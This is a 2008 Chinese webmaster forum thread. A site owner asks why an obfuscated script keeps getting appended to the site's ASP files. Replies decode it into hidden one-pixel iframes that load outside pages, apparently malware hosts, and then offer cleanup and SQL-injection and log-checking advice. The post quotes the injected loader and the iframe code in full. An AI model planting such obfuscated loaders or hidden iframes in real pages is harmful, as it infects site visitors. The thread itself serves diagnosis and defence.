www.4straining.com.cn这个网站,凡叫index和conn的asp文件的底部老是被写入一段script恶意脚本,例如今天发现的<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
),删了又来,头痛,大家帮帮忙好不????!!!!是网站本身的问题还是空间服务器的问题?????
在线等消息.

[ 本帖最后由 yyjj1977 于 2008-2-18 13:45 编辑 ]

document.writeln('<script src=http://OffIce.FAQServ.CoM/FAQ.js'></script>


已经看过这段js，内容如下

复制内容到剪贴板

代码:


document.write('<iframe src="http://www.59.vc/page/add_54738542.htm" width="1" height="1" frameborder="1"></iframe>');
document.write('<iframe src="http://OffIce.FAQServ.com/FAQ.htm" width="1" height="2" frameborder="0"></iframe>');

你的网页里面应该有2个隐藏帧，我不知道里面的地址是什么，但多半是病毒或者木马的网站，建议删除！
但是你删除后过段时间还会有，是被植入木马。现在这个病毒很厉，我的一个服务器上的网页全被挂马了，晕死了。好有不明白的加我QQ596622317.

楼上的,加你不见回复.
不知道还有其他大虾的高见吗?
问题还没解决,好头痛.

这种情况我也遇到过,当时我是用最老土的一种办法就是把空间上的所有的程序和文件都删掉,然后再把备份的程序和文件传上去!

查黑客入侵的方式，有可能是
程序漏洞：
SQL 注入，程序参数过滤不严
如果有动网DVBBS看是否数据库保留了默认目录及文件名，检查论坛里BOKE的默认目录、文件名，是默认的则需修改。
服务器漏洞。最好每几天查一查IIS日志文件，找出上传木马源及大马文件，删了。